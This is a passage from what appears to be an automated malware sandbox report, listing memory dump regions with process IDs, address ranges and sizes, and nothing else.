                                                                                  • memory/4904-62-0x0000000000000000-mapping.dmp
                                                                                  • memory/4916-302-0x00000000048D0000-0x0000000004929000-memory.dmp
                                                                                    Filesize

                                                                                    356KB

                                                                                  • memory/4916-304-0x0000000000400000-0x000000000046C000-memory.dmp
                                                                                    Filesize

                                                                                    432KB

                                                                                  • memory/4916-298-0x0000000000400000-0x00000000047FC000-memory.dmp
                                                                                    Filesize

                                                                                    68.0MB

                                                                                  • memory/4916-301-0x0000000004B40000-0x0000000004B41000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4916-300-0x0000000000400000-0x00000000047FC000-memory.dmp
                                                                                    Filesize

                                                                                    68.0MB

                                                                                  • memory/4916-303-0x0000000004950000-0x00000000049BB000-memory.dmp
                                                                                    Filesize

                                                                                    428KB

                                                                                  • memory/4940-121-0x0000000072660000-0x00000000726F3000-memory.dmp
                                                                                    Filesize

                                                                                    588KB

                                                                                  • memory/4940-117-0x0000000000000000-mapping.dmp
                                                                                  • memory/4948-63-0x0000000000000000-mapping.dmp
                                                                                  • memory/4956-114-0x0000000072660000-0x00000000726F3000-memory.dmp
                                                                                    Filesize

                                                                                    588KB

                                                                                  • memory/4956-116-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4956-111-0x0000000000000000-mapping.dmp
                                                                                  • memory/4980-64-0x00007FF701138270-mapping.dmp
                                                                                  • memory/4980-71-0x000001799C790000-0x000001799C791000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4980-65-0x00007FF9BE500000-0x00007FF9BE57E000-memory.dmp
                                                                                    Filesize

                                                                                    504KB

                                                                                  • memory/4996-66-0x0000000000000000-mapping.dmp
                                                                                  • memory/4996-70-0x0000000072660000-0x00000000726F3000-memory.dmp
                                                                                    Filesize

                                                                                    588KB

                                                                                  • memory/5012-132-0x0000000000000000-mapping.dmp
                                                                                  • memory/5048-74-0x00007FF9BE500000-0x00007FF9BE57E000-memory.dmp
                                                                                    Filesize

                                                                                    504KB

                                                                                  • memory/5048-80-0x0000018451E00000-0x0000018451E01000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5048-73-0x00007FF701138270-mapping.dmp
                                                                                  • memory/5060-75-0x0000000000000000-mapping.dmp
                                                                                  • memory/5060-78-0x0000000072660000-0x00000000726F3000-memory.dmp
                                                                                    Filesize

                                                                                    588KB

                                                                                  • memory/5124-175-0x0000000000000000-mapping.dmp
                                                                                  • memory/5140-190-0x0000000001400000-0x0000000001401000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5140-176-0x0000000000000000-mapping.dmp
                                                                                  • memory/5140-192-0x0000000001430000-0x0000000001431000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5140-216-0x000000001D180000-0x000000001D182000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/5140-177-0x00007FF9A5F60000-0x00007FF9A694C000-memory.dmp
                                                                                    Filesize

                                                                                    9.9MB

                                                                                  • memory/5140-186-0x0000000000EF0000-0x0000000000EF1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5140-191-0x0000000001410000-0x000000000142E000-memory.dmp
                                                                                    Filesize

                                                                                    120KB

                                                                                  • memory/5208-308-0x0000000000C20000-0x0000000000C21000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5228-206-0x0000000000400000-0x000000000040A000-memory.dmp
                                                                                    Filesize

                                                                                    40KB

                                                                                  • memory/5228-205-0x0000000000030000-0x000000000003A000-memory.dmp
                                                                                    Filesize

                                                                                    40KB

                                                                                  • memory/5228-201-0x00000000009B0000-0x00000000009B1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5228-184-0x0000000000000000-mapping.dmp
                                                                                  • memory/5272-188-0x0000000000000000-mapping.dmp
                                                                                  • memory/5328-282-0x0000000000400000-0x0000000000C1B000-memory.dmp
                                                                                    Filesize

                                                                                    8.1MB

                                                                                  • memory/5328-280-0x00000000015D0000-0x0000000001DD2000-memory.dmp
                                                                                    Filesize

                                                                                    8.0MB

                                                                                  • memory/5328-277-0x0000000000400000-0x0000000000C1B000-memory.dmp
                                                                                    Filesize

                                                                                    8.1MB

                                                                                  • memory/5328-276-0x00000000015D0000-0x00000000015D1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5352-194-0x0000000000000000-mapping.dmp
                                                                                  • memory/5400-198-0x0000000002130000-0x0000000002131000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5400-196-0x0000000000000000-mapping.dmp
                                                                                  • memory/5424-258-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5424-259-0x0000000000030000-0x000000000003D000-memory.dmp
                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/5440-199-0x0000000000000000-mapping.dmp
                                                                                  • memory/5496-287-0x0000000001690000-0x0000000001691000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5504-203-0x0000000000000000-mapping.dmp
                                                                                  • memory/5504-207-0x0000000002140000-0x0000000002141000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5516-204-0x0000000000000000-mapping.dmp
                                                                                  • memory/5608-321-0x0000000000490000-0x00000000004FB000-memory.dmp
                                                                                    Filesize

                                                                                    428KB

                                                                                  • memory/5608-320-0x0000000000500000-0x0000000000574000-memory.dmp
                                                                                    Filesize

                                                                                    464KB

                                                                                  • memory/5616-243-0x0000000000400000-0x0000000000415000-memory.dmp
                                                                                    Filesize

                                                                                    84KB

                                                                                  • memory/5616-231-0x0000000000970000-0x0000000000971000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5632-260-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                    Filesize

                                                                                    48KB

                                                                                  • memory/5640-311-0x0000000000400000-0x000000000046F000-memory.dmp
                                                                                    Filesize

                                                                                    444KB

                                                                                  • memory/5640-310-0x0000000000750000-0x00000000007BB000-memory.dmp
                                                                                    Filesize

                                                                                    428KB

                                                                                  • memory/5640-307-0x0000000000AE0000-0x0000000000AE1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5652-209-0x0000000000000000-mapping.dmp
                                                                                  • memory/5664-274-0x0000000002220000-0x0000000002221000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5664-278-0x0000000000730000-0x00000000007C2000-memory.dmp
                                                                                    Filesize

                                                                                    584KB

                                                                                  • memory/5664-279-0x0000000000400000-0x0000000000494000-memory.dmp
                                                                                    Filesize

                                                                                    592KB

                                                                                  • memory/5684-210-0x0000000000000000-mapping.dmp
                                                                                  • memory/5684-212-0x0000000070500000-0x0000000070BEE000-memory.dmp
                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/5684-214-0x00000000002B0000-0x00000000002B1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5700-211-0x0000000000000000-mapping.dmp
                                                                                  • memory/5740-226-0x0000000007060000-0x0000000007061000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5740-223-0x0000000004970000-0x0000000004971000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5740-213-0x0000000000000000-mapping.dmp
                                                                                  • memory/5740-218-0x0000000070500000-0x0000000070BEE000-memory.dmp
                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/5740-220-0x0000000000070000-0x0000000000071000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5740-224-0x00000000022E0000-0x00000000022EB000-memory.dmp
                                                                                    Filesize

                                                                                    44KB

                                                                                  • memory/5772-215-0x0000000000000000-mapping.dmp
                                                                                  • memory/5840-222-0x0000000004710000-0x0000000004711000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5860-332-0x0000000001371000-0x000000000139D000-memory.dmp
                                                                                    Filesize

                                                                                    176KB

                                                                                  • memory/5860-330-0x0000000001370000-0x0000000001D89000-memory.dmp
                                                                                    Filesize

                                                                                    10.1MB

                                                                                  • memory/5860-331-0x0000000001371000-0x000000000139D000-memory.dmp
                                                                                    Filesize

                                                                                    176KB

                                                                                  • memory/5876-228-0x0000000070500000-0x0000000070BEE000-memory.dmp
                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/5876-285-0x0000000007710000-0x0000000007711000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5876-284-0x0000000006EE0000-0x0000000006EE1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5876-229-0x0000000077354000-0x0000000077355000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5876-230-0x00000000011C0000-0x00000000011C1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5876-248-0x0000000005490000-0x0000000005491000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5940-254-0x0000000003F50000-0x0000000003F51000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5940-255-0x0000000003F50000-0x0000000003FD7000-memory.dmp
                                                                                    Filesize

                                                                                    540KB

                                                                                  • memory/5940-256-0x0000000003E90000-0x0000000003F18000-memory.dmp
                                                                                    Filesize

                                                                                    544KB

                                                                                  • memory/5940-257-0x0000000000400000-0x000000000048C000-memory.dmp
                                                                                    Filesize

                                                                                    560KB

                                                                                  • memory/5956-323-0x0000000000630000-0x00000000006C2000-memory.dmp
                                                                                    Filesize

                                                                                    584KB

                                                                                  • memory/5956-322-0x0000000000C60000-0x0000000000C61000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/5956-326-0x0000000000400000-0x0000000000494000-memory.dmp
                                                                                    Filesize

                                                                                    592KB

                                                                                  • memory/6008-266-0x0000000004580000-0x0000000004581000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/6008-267-0x0000000004580000-0x0000000004581000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/6040-251-0x00000000055F0000-0x00000000055F1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/6040-233-0x0000000070500000-0x0000000070BEE000-memory.dmp
                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/6040-252-0x0000000008AB0000-0x0000000008AB1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/6104-236-0x0000000002B40000-0x0000000002B55000-memory.dmp
                                                                                    Filesize

                                                                                    84KB